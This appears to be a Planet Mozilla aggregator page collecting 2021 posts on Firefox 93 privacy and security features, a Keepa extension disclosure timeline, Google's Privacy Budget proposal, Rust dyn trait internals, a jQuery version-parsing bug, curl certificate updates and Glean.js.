Keepa exposing its scraping functionality to arbitrary websites could have had severe impact. With any website being able to extract security tokens this way, impersonating the user towards Amazon would have been possible. Luckily, security measures on Amazon’s side prevented this scenario. Nevertheless, this vulnerability was very concerning. The fact that the extension still doesn’t use inherently secure communication channels for this functionality doesn’t make it better.

Timeline

  • 2021-07-07: Reported the vulnerabilities to the vendor via email (no response and no further communication)
  • 2021-09-15: Keepa 3.88 released, fixing data exposure vulnerability
  • 2021-10-04: Published article (90 days deadline)

Mozilla Security BlogFirefox 93 features an improved SmartBlock and new Referrer Tracking Protections

We are happy to announce that the Firefox 93 release brings two exciting privacy improvements for users of Strict Tracking Protection and Private Browsing. With a more comprehensive SmartBlock 3.0, we combine a great browsing experience with strong tracker blocking. In addition, our new and enhanced referrer tracking protection prevents sites from colluding to share sensitive user data via HTTP referrers.

SmartBlock 3.0

In Private Browsing and Strict Tracking Protection, Firefox goes to great lengths to protect your web browsing activity from trackers. As part of this, the built-in content blocking will automatically block third-party scripts, images, and other content from being loaded from cross-site tracking companies reported by Disconnect. This type of aggressive blocking could sometimes bring small inconveniences, such as missing images or bad performance. In some rare cases, it could even result in a feature malfunction or an empty page.

To compensate, we developed SmartBlock, a mechanism that will intelligently load local, privacy-preserving alternatives to the blocked resources that behave just enough like the original ones to make sure that the website works properly.

The third iteration of SmartBlock brings vastly improved support for replacing the popular Google Analytics scripts and added support for popular services such as Optimizely, Criteo, Amazon TAM and various Google advertising scripts.

As usual, these replacements are bundled with Firefox and can not track you in any way.

HTTP Referrer Protections

The HTTP Referer [sic] header is a browser signal that reveals to a website which location “referred” the user to that website’s server. It is included in navigations and sub-resource requests a browser makes and is frequently used by websites for analytics, logging, and cache optimization. When sent as part of a top-level navigation, it allows a website to learn which other website the user was visiting before.

This is where things get problematic. If the browser sends the full URL of the previous site, then it may reveal sensitive user data included in the URL. Some sites may want to avoid being mentioned in a referrer header at all.

The Referrer Policy was introduced to address this issue: it allows websites to control the value of the referrer header so that a stronger privacy setting can be established for users. In Firefox 87, we went one step further and decided to set the new default referrer policy to strict-origin-when-cross-origin which will automatically trim the most sensitive parts of the referrer URL when it is shared with another website. As such, it prevents sites from unknowingly leaking private information to trackers.

However, websites can still override the introduced default trimming of the referrer, and hence effectively deactivate this protection and send the full URL anyway. This would invite websites to collude with trackers by choosing a more permissive referrer policy and as such remains a major privacy issue.

With the release of version 93, Firefox will ignore less restrictive referrer policies for cross-site requests, such as ‘no-referrer-when-downgrade’, ‘origin-when-cross-origin’, and ‘unsafe-url’ and hence renders such privacy violations ineffective. In other words, Firefox will always trim the HTTP referrer for cross-site requests, regardless of the website’s settings.

For same-site requests, websites can of course still send the full referrer URL.

Enabling these new Privacy Protections

As a Firefox user who is using Strict Tracking Protection and Private Browsing, you can benefit from the additionally provided privacy protection mechanism as soon as your Firefox auto-updates to Firefox 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 features an improved SmartBlock and new Referrer Tracking Protections appeared first on Mozilla Security Blog.

Mozilla Security BlogFirefox 93 protects against Insecure Downloads

 

Downloading files on your device still exposes a major security risk and can ultimately lead to an entire system compromise by an attacker. Especially because the security risks are not apparent. To better protect you from the dangers of insecure, or even undesired downloads, we integrated the following two security enhancements which will increase security when you download files on your computer. In detail, Firefox will:

  • block insecure HTTP downloads on a secure HTTPS page, and
  • block downloads in sandboxed iframes, unless the iframe is explicitly annotated with the allow-downloads attribute.

 

Blocking Downloads relying on insecure connections

Downloading files via an insecure HTTP connection, generally exposes a major security risk because data transferred by the regular HTTP protocol is unprotected and transferred in clear text, such that attackers are able to view, steal, or even tamper with the transmitted data. Put differently, downloading a file over an insecure connection allows an attacker to replace the file with malicious content which, when opened, can ultimately lead to an entire system compromise.

 

Firefox 93 prompting the end user about a ‘Potential security risk’ when downloading a file using an insecure connection.

 

As illustrated in the Figure above, if Firefox detects such an insecure download, it will initially block the download and prompt you signalling the Potential security risk. This prompt allows you to either stop the download and Remove the file, or alternatively grants you the option to override the decision and download the file anyway, though it’s safer to abandon the download at this point.

 

Blocking Downloads in sandboxed iframes

The Inline Frame sandbox attribute is the preferred way to lock down capabilities of embedded third-party content. Currently, even with the sandbox attribute set, malicious content could initiate a drive-by download, prompting the user to download malicious files. Unless the sandboxed content is explicitly annotated with the ‘allow-downloads’ attribute, Firefox will  protect you against such drive-by downloads. Put differently, downloads initiated from sandboxed contexts without this attribute will be canceled silently in the background without any user browsing disruption.

 

It’s Automatic!

As a Firefox user, you can benefit from the additionally provided security mechanism as soon as your Firefox auto-updates to version 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 protects against Insecure Downloads appeared first on Mozilla Security Blog.

Mozilla Security BlogSecuring Connections: Disabling 3DES in Firefox 93

As part of our continuing work to ensure that Firefox provides secure and private network connections, it periodically becomes necessary to disable configurations or even entire protocols that were once thought to be secure, but no longer provide adequate protection. For example, last year, early versions of the Transport Layer Security (TLS) protocol were disabled by default.

One of the options that goes into configuring TLS is the choice of which encryption algorithms to enable. That is, which methods are available to use to encrypt and decrypt data when communicating with a web server?

Goodbye, 3DES

3DES (“triple DES”, an adaptation of DES (“Data Encryption Standard”)) was for many years a popular encryption algorithm. However, as attacks against it have become stronger, and as other more secure and efficient encryption algorithms have been standardized and are now widely supported, it has fallen out of use. Recent measurements indicate that Firefox encounters servers that choose to use 3DES about as often as servers that use deprecated versions of TLS.

As long as 3DES remains an option that Firefox provides, it poses a security and privacy risk. Because it is no longer necessary or prudent to use this encryption algorithm, it is disabled by default in Firefox 93.

Addressing Compatibility

As with disabling obsolete versions of TLS, deprecating 3DES may cause compatibility issues. We hypothesize that the remaining uses of 3DES correspond mostly to outdated devices that use old cryptography and cannot be upgraded. It may also be that some modern servers inexplicably (perhaps unintentionally) use 3DES when other more secure and efficient encryption algorithms are available. Disabling 3DES by default helps with the latter case, as it forces those servers to choose better algorithms. To account for the former situation, Firefox will allow 3DES to be used when deprecated versions of TLS have manually been enabled. This will protect connections by default by forbidding 3DES when it is unnecessary while allowing it to be used with obsolete servers if necessary.

The post Securing Connections: Disabling 3DES in Firefox 93 appeared first on Mozilla Security Blog.

The Mozilla BlogDo you need a VPN at home? Here are 5 reasons you might.

You might have heard of VPNs — virtual private networks — at some point, and chalked them up to something only “super techy” people or hackers would ever use. At this point in the evolution of online life, however, VPNs have become more mainstream, and anyone may have good reasons to use one. VPNs are beneficial for added privacy when you’re connected to a public wifi network, and you might also want to use a VPN at home when you’re online as well. Here are five reasons to consider using a VPN at home.

Stop your ISP from watching you 

Did you know that when you connect to the internet at home through your internet service provider (ISP), it can track what you do online? Even though your traffic is usually encrypted using HTTPS, this doesn’t conceal which sites you are visiting. Your ISP can see every site you visit and track things like how often you visit sites and how long you’re on them. That’s rich personal — and private — information you’re giving away to your ISP every time you connect to the internet at home. The good news is that a VPN at home can prevent your ISP from snooping on you by encrypting your traffic before the ISP can see it.

How do VPNs work?

Get answers to nine common questions about VPNs

Secure yourself on a shared building network

Some apartment buildings offer wifi as an incentive to residents, but just like your ISP, anyone else on the network can see what sites you are visiting. Do you even know all your neighbors, let alone know if they’re bumbling true crime podcast fanatics or even actual cyber criminals? Do you know for sure that your landlord or building manager isn’t tracking your internet traffic? If you’re concerned about any of that, a VPN can add extra privacy on your shared network by encrypting your traffic between you and your VPN provider so that no one on your local network can decipher or modify it.

Block nosy housemates

Similar to a shared apartment network, sharing an internet connection could leave your browsing behavior vulnerable to snooping by housemates or any other untrustworthy person who accesses your network. A VPN at home adds an extra layer of encryption, preventing people on your network from seeing what websites you go to.

Increase remote work security

Working remotely, at least part of the time, is the new normal for millions of office workers, and some people are experiencing a VPN for the first time. Some employers offer an enterprise VPN for home workers and some even require  logging into one to access a company file server.

Explore the world at home

There are some fun reasons to use a VPN at home, too. You can get access to shows, websites and livestreams in dozens of different countries. See what online shopping is like if you were in a different locale and get the feeling of gaming from somewhere new. 

The post Do you need a VPN at home? Here are 5 reasons you might. appeared first on The Mozilla Blog.

Cameron KaiserTenFourFox FPR32 SPR5 available (the last official build)

TenFourFox Feature Parity Release 32 Security Parity Release 5 "32.5" is available for testing (downloads, hashes). Aside from the announced change with .inetloc and .webloc handling, this release also updates the ATSUI font blacklist and includes the usual security updates. It will go live Monday evening Pacific as usual assuming no issues.

As stated previously, this is the last official build before TenFourFox goes into hobby mode; version checking is therefore disabled in this release since there will be no new official build to check for. I know I keep teasing a future consolidated post about how users who want to continue using it can get or make their own builds, but I want to update the docs and FAQ first, plus actually give you something new to test your build out (in this case it's going to be switching the certificate and security base over to Firefox 91ESR from 78ESR). There are already some options already apart from the official method and we'll discuss those, but if you yourself are gearing up to offer public builds or toolkits, feel free to make this known in the comments. Work is a little hairy this month but I want to get to this in the next couple weeks.

Cameron Kaisercurl, Let's Encrypt and Apple laziness

The built-in version of curl on any Power Mac version of OS X will not be capable of TLS 1.1 or higher, so most of you who need it will have already upgraded to an equivalent with MacPorts. However, even for later Intel Macs that are ostensibly supported -- including my now legacy MacBook Air with Mojave I keep around for running 32-bit Intel -- the expiration of one of Let's Encrypt's root certificates yesterday will suddenly mean curl may suddenly cease connecting to TLS sites with Let's Encrypt certificates. Yesterday I was trying to connect to one of my own Floodgap sites, unexpectedly got certificate errors I wasn't seeing in TenFourFox or mainline Firefox, and, after a moment of panic, suddenly realized what had happened. While you can use -k to ignore the error, that basically defeats the entire idea of having a certificate to start with.

The real hell of it is that Mojave 10.14 is still technically supported by Apple, and you would think updating the curl root certificate store would be an intrinsic part of security updates, but you'd be wrong. The issue with old roots even affects Safari on some Monterey betas, making the best explanation more Apple laziness than benign neglect. Firefox added this root ages ago and so did TenFourFox.

If you are using MacPorts curl, which is (IMHO) the best solution on Power Macs due to Ken's diligence but is still a dandy alternative to Homebrew on Intel Macs, the easiest solution is to ensure curl-ca-bundle is up-to-date. Homebrew (and I presume Tigerbrew, for 10.4) can do brew install curl-ca-bundle, assuming your installation is current.

However, I use the built-in curl on the Mojave MacBook Air. Ordinarily I would just do an in-place update of the root certificate bundle, as I did on my 10.4 G5 before I started using a self-built curl, but thanks to System Integrity Protection you're not allowed to do that anymore even as root. Happily, the cURL maintainers themselves have a downloadable root certificate store which is periodically refreshed. Download that, put it somewhere in your home directory, and in your .login or .profile or whatever, set CURL_CA_BUNDLE to its location (on my system, I have a ~/bin directory, so I put it there and set it to /Users/yourname/bin/cacert.pem).

The Mozilla BlogMiracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we will be sharing the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution each week.

Here’s what made it to the Top Shelf for the week of September 27, 2021, in no particular order.

From Licorice Pizza to McRibs to #NationalCoffeeDay, food-related topics boiled to the top of the trends this week on Twitter, though not every one of them is actually food… we’ll leave you to decide which!

Pocket Joy List Project

The Pocket Joy List Project

The stories, podcasts, poems and songs we always come back to

The post Miracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week appeared first on The Mozilla Blog.

The Mozilla BlogAnalysis of Google’s Privacy Budget Proposal

Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.)

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users.
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 2

In the previous post, we uncovered a key challenge for dyn and async traits: the fact that, in Rust today, dyn types have to specify the values for all associated types. This post is going to dive into more background about how dyn traits work today, and in particular it will talk about where that limitation comes from.

Today: Dyn traits implement the trait

In Rust today, assuming you have a “dyn-safe” trait DoTheThing , then the type dyn DoTheThing implements Trait. Consider this trait:

trait DoTheThing {
	fn do_the_thing(&self);
}

impl DoTheThing for String {
    fn do_the_thing(&self) {
        println!({}, self);
    }
}

And now imagine some generic function that uses the trait:

fn some_generic_fn<T: ?Sized + DoTheThing>(t: &T) {
	t.do_the_thing();
}

Naturally, we can call some_generic_fn with a &String, but — because dyn DoTheThing implements DoTheThing — we can also call some_generic_fn with a &dyn DoTheThing:

fn some_nongeneric_fn(x: &dyn DoTheThing) {
    some_generic_fn(x)
}

Dyn safety, a mini retrospective

Early on in Rust, we debated whether dyn DoTheThing ought to implement the trait DoTheThing or not. This was, indeed, the origin of the term “dyn safe” (then called “object safe”). At the time, I argued in favor of the current approach: that is, creating a binary property. Either the trait was dyn safe, in which case dyn DoTheThing implements DoTheThing, or it was not, in which case dyn DoTheThing is not a legal type. I am no longer sure that was the right call.

What I liked at the time was the idea that, in this model, whenever you see a type like dyn DoTheThing, you know that you can use it like any other type that implements DoTheThing.

Unfortunately, in practice, the type dyn DoTheThing is not comparable to a type like String. Notably, dyn types are not sized, so you can’t pass them around by value or work with them like strings. You must instead always pass around some kind of pointer to them, such as a Box<dyn DoTheThing> or a &dyn DoTheThing. This is “unusual” enough that we make you opt-in to it for generic functions, by writing T: ?Sized.

What this means is that, in practice, generic functions don’t accept dyn types “automatically”, you have to design for dyn explicitly. So a lot of the benefit I envisioned didn’t come to pass.

Static versus dynamic dispatch, vtables

Let’s talk for a bit about dyn safety and where it comes from. To start, we need to explain the difference between static dispatch and virtual (dyn) dispatch. Simply put, static dispatch means that the compiler knows which function is being called, whereas dyn dispatch means that the compiler doesn’t know. In terms of the CPU itself, there isn’t much difference. With static dispatch, there is a “hard-coded” instruction that says “call the code at this address”1; with dynamic dispatch, there is an instruction that says “call the code whose address is in this variable”. The latter can be a bit slower but it hardly matters in practice, particularly with a successful prediction.

When you use a dyn trait, what you actually have is a vtable. You can think of a vtable as being a kind of struct that contains a collection of function pointers, one for each method in the trait. So the vtable type for the DoTheThing trait might look like (in practice, there is a bit of extra data, but this is close enough for our purposes):

struct DoTheThingVtable {
    do_the_thing: fn(*mut ())
}

Here the do_the_thing method has a corresponding field. Note that the type of the first argument ought to be &self, but we changed it to *mut (). This is because the whole idea of the vtable is that you don’t know what the self type is, so we just changed it to “some pointer” (which is all we need to know).

When you create a vtable, you are making an instance of this struct that is tailored to some particular type. In our example, the type String implements DoTheThing, so we might create the vtable for String like so:

static Vtable_DoTheThing_String: &DoTheThingVtable = &DoTheThingVtable {
    do_the_thing: <String as DoTheThing>::do_the_thing as fn(*mut ())
    //            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    //            Fully qualified reference to `do_the_thing` for strings
};

You may have heard that a &dyn DoTheThing type in Rust is a wide pointer. What that means is that, at runtime, it is actually a pair of two pointers: a data pointer and a vtable pointer for the DoTheThing trait. So &dyn DoTheThing is roughly equivalent to:

(*mut (), &’static DoTheThingVtable)

When you cast a &String to a &dyn DoTheThing, what actually happens at runtime is that the compiler takes the &String pointer, casts it to *mut (), and pairs it with the appropriate vtable. So, if you have some code like this:

let x: &String = &Hello, Rustaceans.to_string();
let y: &dyn DoTheThing = x;

It winds up “desugared” to something like this:

let x: &String = &Hello, Rustaceans.to_string();
let y: (*mut (), &static DoTheThingVtable) = 
    (x as *mut (), Vtable_DoTheThing_String);

The dyn impl

We’ve seen how you create wide pointers and how the compiler represents vtables. We’ve also seen that, in Rust, dyn DoTheThing implements DoTheThing. You might wonder how that works. Conceptually, the compiler generates an impl where each method in the trait is implemented by extracting the function pointer from the vtable and calling it:

impl DoTheThing for dyn DoTheThing {
    fn do_the_thing(self: &dyn DoTheThing) {
        // Remember that `&dyn DoTheThing` is equivalent to
        // a tuple like `(*mut (), &’static DoTheThingVtable)`:
        let (data_pointer, vtable_pointer) = self;

        let function_pointer = vtable_pointer.do_the_thing;
        function_pointer(data_pointer);
    }
}

In effect, when we call a generic function like some_generic_fn with T = dyn DoTheThing, we monomorphize that call exactly like any other type. The call to do_the_thing is dispatched against the impl above, and it is that special impl that actually does the dynamic dispatch. Neat.

Static dispatch permits monomorphization

Now that we’ve seen how and when vtables are constructed, we can talk about the rules for dyn safety and where they come from. One of the most basic rules is that a trait is only dyn-safe if it contains no generic methods (or, more precisely, if its methods are only generic over lifetimes, not types). The reason for this rule derives directly from how a vtable works: when you construct a vtable, you need to give a single function pointer for each method in the trait (or, perhaps, a finite set of function pointers). The problem with generic methods is that there is no single function pointer for them: you need a different pointer for each type that they’re applied to. Consider this example trait, PrintPrefixed:

trait PrintPrefixed {
    fn prefix(&self) -> String;
    fn apply<T: Display>(&self, t: T);
}

impl PrintPrefixed for String {
    fn prefix(&self) -> String {
        self.clone()
    }
    fn apply<T: Display>(&self, t: T) {
        println!({}: {}, self, t);
    }
}

What would a vtable for String as PrintPrefixed look like? Generating a function pointer for prefix is no problem, we can just use <String as PrintPrefixed>::prefix. But what about apply? We would have to include a function pointer for <String as PrintPrefixed>::apply<T>, but we don’t know yet what the T is!

In contrast, with static dispatch, we don’t have to know what T is until the point of call. In that case, we can generate just the copy we need.

Partial dyn impls

The previous point shows that a trait can have some methods that are dyn-safe and some methods that are not. In current Rust, this makes the entire trait be “not dyn safe”, and this is because there is no way for us to write a complete impl PrintPrefixed for dyn PrintPrefixed:

impl PrintPrefixed for dyn PrintPrefixed {
    fn prefix(&self) -> String {
        // For `prefix`, no problem:
        let prefix_fn = /* get prefix function pointer from vtable */;
        prefix_fn();
    }
    fn apply<T: Display>(&self, t: T) {
        // For `apply`, we can’t handle all `T` types, what field to fetch?
        panic!(No way to implement apply)
    }
}

Under the alternative design that was considered long ago, we could say that a dyn PrintPrefixed value is always legal, but dyn PrintPrefixed only implements the PrintPrefixed trait if all of its methods (and other items) are dyn safe. Either way, if you had a &dyn PrintPrefixed, you could call prefix. You just wouldn’t be able to use a dyn PrintPrefixed with generic code like fn foo<T: ?Sized + PrintPrefixed>.

(We’ll return to this theme in future blog posts.)

If you’re familiar with the “special case” around trait methods that require where Self: Sized, you might be able to see where it comes from now. If a method has a where Self: Sized requirement, and we have an impl for a type like dyn PrintPrefixed, then we can see that this impl could never be called, and so we can omit the method from the impl (and vtable) altogether. This is awfully similar to saying that dyn PrintPrefixed is always legal, because it means that there only a subset of methods that can be used via virtual dispatch. The difference is that dyn PrintPrefixed: PrintPrefixed still holds, because we know that generic code won’t be able to call those “non-dyn-safe” methods, since generic code would have to require that T: ?Sized.

Associated types and dyn types

We began this saga by talking about associated types and dyn types. In Rust today, a dyn type is required to specify a value for each associated type in the trait. For example, consider a simplified Iterator trait:

trait Iterator {
    type Item;

    fn next(&mut self) -> Option<Self::Item>;
}

This trait is dyn safe, but if you actually have a dyn in practice, you would have to write something like dyn Iterator<Item = u32>. The impl Iterator for dyn Iterator looks like:

impl<T> Iterator for dyn Iterator<Item = T> {
    type Item = T;
    
    fn next(&mut self) -> Option<T> {
        let next_fn = /* get next function from vtable */;
        return next_fn(self);
    }
}

Now you can see why we require all the associated types to be part of the dyn type — it lets us write a complete impl (i.e., one that includes a value for each of the associated types).

Conclusion

We covered a lot of background in this post:

  • Static vs dynamic dispatch, vtables
  • The origin of dyn safety, and the possibility of “partial dyn safety”
  • The idea of a synthesized impl Trait for dyn Trait

Mozilla Open Policy & Advocacy BlogAddressing gender-based online harms in the DSA

Last year the European Commission published the Digital Services Act (DSA) proposal, a draft law that seeks to set a new standard for platform accountability. We welcomed the draft law when it was published, and since then we have been working to ensure it is strengthened and elaborated as it proceeds through the mark-up stage. Today we’re confirming our support for a new initiative that focuses on improving the DSA with respect to gender-based online harm, an objective that aligns with our policy vision and the Mozilla Manifesto addendum.

An overarching focus of our efforts to improve the DSA have focused on the draft law’s risk assessment and auditing provisions. In order to structurally improve the health of the internet ecosystem, we need laws that compel platforms to meaningfully assess and mitigate the systemic risks stemming from the design and operation of their services. While the draft DSA is a good start, it falls short when it comes to specifying the types of systemic risks that platforms need to address.

One such area of systemic risk that warrants urgent attention is gender-based online harm. Women and non-binary people are subject to massive and persistent abuse online, with 74% of women reporting experiencing some form of online violence in the EU in 2020. Women from marginalised communities, including LGBTQ+ people, women of colour, and Black women in particular, are often disproportionately targeted with online abuse.

In our own platform accountability research this untenable reality has surfaced time and time again. For instance, in one testimony submitted to Mozilla Foundation as part of our YouTube Regrets campaign, one person wrote “In coming out to myself and close friends as transgender, my biggest regret was turning to YouTube to hear the stories of other trans and queer people. Simply typing in the word “transgender” brought up countless videos that were essentially describing my struggle as a mental illness and as something that shouldn’t exist. YouTube reminded me why I hid in the closet for so many years.”

Another story read: “I was watching a video game series on YouTube when all of a sudden I started getting all of these anti-women, incel and men’s rights recommended videos. I ended up removing that series from my watch history and going through and flagging those bad recommendations as ‘not interested’. It was gross and disturbing. That stuff is hate, and I really shouldn’t have to tell YouTube that it’s wrong to promote it.”

Indeed, further Mozilla research into this issue on YouTube has underscored the role of automated content recommender systems in exacerbating the problem, to the extent that they can recommend videos that violate the platform’s very own policies, like hate speech.

This is not only a problem on YouTube, but on the web at large. And while the DSA is not a silver bullet for addressing gender-based online harm, it can be an important part of the solution. To underscore that belief, we – as the Mozilla Foundation – have today signed on to a joint Call with stakeholders from across the digital rights, democracy, and womens’ rights communities. This Call aims to invigorate efforts to improve the DSA provisions around risk assessment and management, and ensure lawmakers appreciate the scale of gender-based online harm that communities face today.

This initiative complements other DSA-focused engagements that seek to address gender-based online harms. In July, we signaled our support for the The Who Writes the Rules campaign, and we stand in solidarity with the just-published testimonies of gender-based online abuse faced by the initiative’s instigators.

The DSA has been rightly-billed as an accountability game-changer. Lawmakers owe it to those who suffer gender-based online harm to ensure those systemic risks are properly accounted for.

The full text of the Call can be read here.

The post Addressing gender-based online harms in the DSA appeared first on Open Policy & Advocacy.

The Mozilla BlogSuperhero passwords may be your kryptonite wherever you go online

A password is like a key to your house. In the online world, your password keeps your house of personal information safe, so a super strong password is like having a superhero in a fight of good vs. evil. In recognition of Cybersecurity Awareness month, we revisited our “Princesses make terrible passwords for Disney+ and every other account,” and took a look to see how fortified superhero passwords are in the fight against hackers and breaches. According to haveibeenpwned.com, take a look at the how many times these superhero passwords have showed up in breached datasets:

And if you thought maybe their real identities might make for a better password, think again!

Lucky for you, we’ve got a family of products from a company you can trust, Mozilla, a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet. Here are your best tools in the fight against hackers and breaches:

Keep passwords safe from cyber threats with this new Firefox super power on Firefox on Android

This Cybersecurity Awareness month, we added new features for Firefox on Android, to keep your passwords safe. You might not have every password memorized by heart, nor do you need to when you use Firefox. With Firefox, users will be able to seamlessly access Firefox saved passwords. This means you can use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. It’s that seamless and simple. Plus, you can also use biometric security, such as your face or fingerprint, to unlock the app and safely access your accounts. These new features will be available next Tuesday with the latest Firefox on Android release. Here are more details on the upcoming new features:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and you can use it on both mobile and desktop.  
<figcaption>Create and add new passwords</figcaption>
  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
<figcaption>Sync all your passwords across desktop and mobile devices</figcaption>
  • Unlock your passwords with your fingerprint and face – Now only you can safely open your accounts when you use biometric security such as your fingerprint or face to unlock the access page to your logins and passwords.

Forget J.A.R.V.I.S, keep informed of hacks and breaches with Firefox Monitor 

Avoid your spidey senses from tingling every time you hear about hacks and breaches by signing up with Firefox Monitor. You’ll be able to keep an eye on your accounts once you sign up for Firefox Monitor and get alerts delivered to your email whenever there’s been a data breach or if your accounts have been hacked.

X Ray vision won’t work on a Virtual Private Network like Mozilla VPN

One of the reasons people use a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and VPN server, is to protect themselves whenever they use a public WiFi network. It sounds harmless, but public WiFi networks can be like a backdoor for hackers. With a VPN, you can rest assured you’re safe whenever you use the public WiFi network at your local cafe or library. Find and use a trusted VPN provider like our Mozilla VPN, a fast and easy-to-use VPN service. Thousands of people have signed up to subscribe to our Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the Web.


How did we get these numbers? Unfortunately, we don’t have a J.A.R.V.I.S, so we looked these up in haveipbeenpwned.com. We couldn’t access any data files, browse lists of passwords or link passwords to logins — that info is inaccessible and kept secure — but we could look up random passwords manually. Current numbers on the site may be higher than at time of publication as new datasets are added to HIBP. Alas, data breaches keep happening. There’s no time like the present to make sure all your passwords are built like Ironman.

The post Superhero passwords may be your kryptonite wherever you go online appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgMDN Web Docs at Write the Docs Prague 2021

The MDN Web Docs team is pleased to sponsor Write the Docs Prague 2021, which is being held remotely this year. We’re excited to join hundreds of documentarians to learn more about collaborating with writers, developers, and readers to make better documentation. We plan to take part in all that the conference has to offer, including the Writing Day, Job Fair, and the virtual hallway track.

In particular, we’re looking forward to taking part in the Writing Day on Sunday, October 3, where we’ll be joining our friends from Open Web Docs (OWD) to work on MDN content updates together. We’re planning to invite our fellow conference attendees to take part in making open source documentation. OWD is also sponsoring ​​Write the Docs; read their announcement to learn more.

The post MDN Web Docs at Write the Docs Prague 2021 appeared first on Mozilla Hacks - the Web developer blog.

Mike TaylorHow to delete your jQuery Reject Plugin in 1 easy step.

In my last post on testing Chrome version 100, I encouraged everyone to flip on that flag and report bugs. It’s with a heavy heart that I announce that Ian Kilpatrick did so, and found a bug.

(⌣_⌣”)

The predictable bug is that parks.smcgov.org will tell you your browser is out of date, and recommend that you upgrade it via a modal straight out of the year 2009.

screenshot of a modal telling you to upgrade your browser, with a farmville image because that was popular in 2009?

(Full Disclosure: I added the FarmVille bit so you can get back into a 2009 headspace, don’t sue me Zynga).

The bug is as follows:

r.versionNumber = parseFloat(r.version, 10) || 0;
var minorStart = 1;

if (r.versionNumber < 100 && r.versionNumber > 9) {
  minorStart = 2;
}

r.versionX = r.version !== x ? r.version.substr(0, minorStart) : x;
r.className = r.name + r.versionX;

Back when this was written, a version 100 was unfathomable (or more likely, the original authors were looking forward to the chaos of a world already dealing with the early effects of climate change, and now we have to deal with this?, a mere 11 years later) so the minorStart offset approach was perhaps reasonable.

There’s a few possible fixes here, as I see it:

I. Kick the can down the road a bit more:

if (r.versionNumber < 1000 && r.versionNumber > 99) {
  minorStart = 3;
}

I don’t really plan on being alive when Chrome 999 comes out, so.

II. Kick the can down the road like, way further:

r.versionX = Math.trunc(parseFloat(r.version)) || x;

According to jakobkummerow, this should work until browsers hit version 9007199254740991 (aka Number.MAX_SAFE_INTEGER in JS).

III. (Recommended) Just remove this script entirely from your site. It’s outlived its purpose.

Also, if you happen to work on any of the following 1936 sites using this script, you know what to do (pick option Roman numeral 3, just to be super clear).

Data@MozillaThis Week in Glean: Announcement: Glean.js v0.19.0 supports Node.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)


From the start, the Glean JavaScript SDK (Glean.js) was conceptualized as a JavaScript telemetry library for diverse JavaScript environments. When we built the proof-of-concept, we tested that idea out and created a library that worked in Qt/QML apps, websites, web extensions, Node.js servers and CLIs, and Electron apps.

